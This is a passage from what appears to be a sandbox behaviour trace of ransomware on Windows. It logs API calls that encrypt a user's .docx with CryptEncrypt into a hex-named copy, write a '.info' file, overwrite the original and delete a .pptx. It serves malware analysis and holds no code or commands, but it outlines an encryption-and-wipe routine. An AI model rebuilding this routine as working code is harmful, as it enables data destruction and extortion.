(hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.424] CloseHandle (hObject=0x36c) returned 1 [0075.424] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi3qd09uyx pa91lnj.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.424] GetFileType (hFile=0x36c) returned 0x1 [0075.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.424] GetFileType (hFile=0x36c) returned 0x1 [0075.424] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0075.424] CloseHandle (hObject=0x36c) returned 1 [0075.424] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi3qd09uyx pa91lnj.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.424] GetFileType (hFile=0x36c) returned 0x1 [0075.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.424] GetFileType (hFile=0x36c) returned 0x1 [0075.424] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.425] CloseHandle (hObject=0x36c) returned 1 [0075.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.425] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ooi3qd09uyx pa91lnj.pptx")) returned 1 [0075.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oOI3qd09uyx pA91lnJ.pptx", lpFilePart=0x0) returned 0x40 [0075.426] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D", lpFilePart=0x0) returned 0x48 [0075.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a606225924f93eadb626be09ddb49e4d"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.426] GetFileType (hFile=0x36c) returned 0x1 [0075.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.426] GetFileType (hFile=0x36c) returned 0x1 [0075.426] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.426] CloseHandle (hObject=0x36c) returned 1 [0075.426] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D", lpFilePart=0x0) returned 0x48 [0075.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a606225924f93eadb626be09ddb49e4d"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.426] GetFileType (hFile=0x36c) returned 0x1 [0075.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.426] GetFileType (hFile=0x36c) returned 0x1 [0075.426] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.426] CloseHandle (hObject=0x36c) returned 1 [0075.427] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D", lpFilePart=0x0) returned 0x48 [0075.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A606225924F93EADB626BE09DDB49E4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a606225924f93eadb626be09ddb49e4d"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.427] GetFileType (hFile=0x36c) returned 0x1 [0075.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.427] GetFileType (hFile=0x36c) returned 0x1 [0075.427] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.427] CloseHandle (hObject=0x36c) returned 1 [0075.427] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.427] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.428] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x21f88a0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x4ce9f0) returned 1 [0075.428] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.428] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.428] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x21f8990, pdwDataLen=0x1bf5db30 | out: pbData=0x21f8990*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.428] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x21f8ab0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626b40) returned 1 [0075.428] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.428] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.428] CryptDuplicateKey (in: hKey=0x1a626b40, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626c20) returned 1 [0075.429] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.429] CryptSetKeyParam (hKey=0x1a626c20, dwParam=0x4, pbData=0x21f8bf8*=0x1, dwFlags=0x0) returned 1 [0075.429] CryptSetKeyParam (hKey=0x1a626c20, dwParam=0x1, pbData=0x21f8ba8, dwFlags=0x0) returned 1 [0075.429] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0075.429] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0075.429] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plhg8_t9.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.429] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436", lpFilePart=0x0) returned 0x48 [0075.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3c3a646563f35bb0ffc065e4a6b2a436"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.430] ReadFile (in: hFile=0x36c, lpBuffer=0x21f8fa8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x21f8fa8*, lpNumberOfBytesRead=0x1bf5da28*=0xa001, lpOverlapped=0x0) returned 1 [0075.431] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x220cfc0*, pdwDataLen=0x1bf5da80*=0xa000, dwBufLen=0xa000 | out: pbData=0x220cfc0*, pdwDataLen=0x1bf5da80*=0xa000) returned 1 [0075.431] WriteFile (in: hFile=0x358, lpBuffer=0x220cfc0*, nNumberOfBytesToWrite=0xa000, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x220cfc0*, lpNumberOfBytesWritten=0x1bf5da18*=0xa000, lpOverlapped=0x0) returned 1 [0075.432] ReadFile (in: hFile=0x36c, lpBuffer=0x21f8fa8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x21f8fa8*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.432] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2217000*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x2217000*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.433] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2217050*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x2217050*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.433] WriteFile (in: hFile=0x358, lpBuffer=0x22170a0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x22170a0*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.433] CloseHandle (hObject=0x358) returned 1 [0075.434] CloseHandle (hObject=0x36c) returned 1 [0075.434] CryptDestroyKey (hKey=0x4ce9f0) returned 1 [0075.434] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0075.434] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0075.434] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436", lpFilePart=0x0) returned 0x48 [0075.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3c3a646563f35bb0ffc065e4a6b2a436"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.434] GetFileType (hFile=0x36c) returned 0x1 [0075.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.434] GetFileType (hFile=0x36c) returned 0x1 [0075.434] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.436] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.437] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.438] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.439] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.439] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.439] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.439] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.439] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.439] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.439] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x10, lpOverlapped=0x0) returned 1 [0075.440] ReadFile (in: hFile=0x36c, lpBuffer=0x2218798, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2218798*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.440] CloseHandle (hObject=0x36c) returned 1 [0075.449] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436.info", lpFilePart=0x0) returned 0x4d [0075.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3C3A646563F35BB0FFC065E4A6B2A436.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3c3a646563f35bb0ffc065e4a6b2a436.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.463] GetFileType (hFile=0x36c) returned 0x1 [0075.463] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.463] GetFileType (hFile=0x36c) returned 0x1 [0075.463] WriteFile (in: hFile=0x36c, lpBuffer=0x2224e58*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x2224e58*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.464] CloseHandle (hObject=0x36c) returned 1 [0075.465] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.465] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plhg8_t9.docx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8188be60, ftCreationTime.dwHighDateTime=0x1d4cc66, ftLastAccessTime.dwLowDateTime=0xc2317910, ftLastAccessTime.dwHighDateTime=0x1d4cb63, ftLastWriteTime.dwLowDateTime=0xc2317910, ftLastWriteTime.dwHighDateTime=0x1d4cb63, nFileSizeHigh=0x0, nFileSizeLow=0xa001)) returned 1 [0075.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.465] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.465] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", dwFileAttributes=0x80) returned 1 [0075.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.466] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plhg8_t9.docx"), fInfoLevelId=0x0, lpFileInformation=0x222ca40 | out: lpFileInformation=0x222ca40*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8188be60, ftCreationTime.dwHighDateTime=0x1d4cc66, ftLastAccessTime.dwLowDateTime=0xc2317910, ftLastAccessTime.dwHighDateTime=0x1d4cb63, ftLastWriteTime.dwLowDateTime=0xc2317910, ftLastWriteTime.dwHighDateTime=0x1d4cb63, nFileSizeHigh=0x0, nFileSizeLow=0xa001)) returned 1 [0075.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx", lpFilePart=0x0) returned 0x35 [0075.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pLHg8_t9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\plhg8_t9.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.466] GetFileType (hFile=0x36c) returned 0x1 [0075.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.466] GetFileType (hFile=0x36c) returned 0x1 [0075.466] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.467] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.468] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.468] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.469] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.470] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.471] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.471] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.472] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.473] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.474] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.474] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x222cec8*, lpNumberOfBytesWritten=0x1bf5daa8*=0x200, lpOverlapped=0x0) returned 1 [0075.474] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.475] WriteFile (in: hFile=0x36c, lpBuffer=0x222cec8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: 